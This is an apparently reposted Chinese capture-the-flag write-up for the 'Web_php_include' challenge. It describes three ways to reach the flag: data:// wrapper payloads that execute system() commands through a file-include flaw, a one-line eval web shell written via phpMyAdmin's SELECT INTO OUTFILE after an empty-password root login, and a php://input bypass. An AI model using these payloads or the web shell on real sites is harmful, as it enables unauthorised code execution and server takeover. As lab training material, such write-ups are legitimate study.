攻防世界-Web_php_include

2021/10/10 17:16:03

本文主要是介绍攻防世界-Web_php_include,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

打开网页

这个网页会显示变量hello的值,,并且执行变量page中的内容,并且还会替换掉page变量中的php://

方法一

因为php://被过滤了,所以要用其他的伪协议,比如data://

所以构造payload

?page=data://text/plain,<?system('ls -l')?>

得到了flag文件的名称

于是构造payload得到flag内容

?page=data://text/plain,<?system('cat fl4gisisish3r3.php')?>

查看源码得到flag

方法二

通过御剑扫描后台得到

该网站存在phpmyadmin,使用root,密码为空进入后台

输入一句话木马

select "<?php eval(@$_POST['flag']); ?>" into outfile '/tmp/test.php'

用蚁剑连接

即可得到flag

方法三

可以用Php://input绕过过滤,然后在包内添加php命令得到flag



这篇关于攻防世界-Web_php_include的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程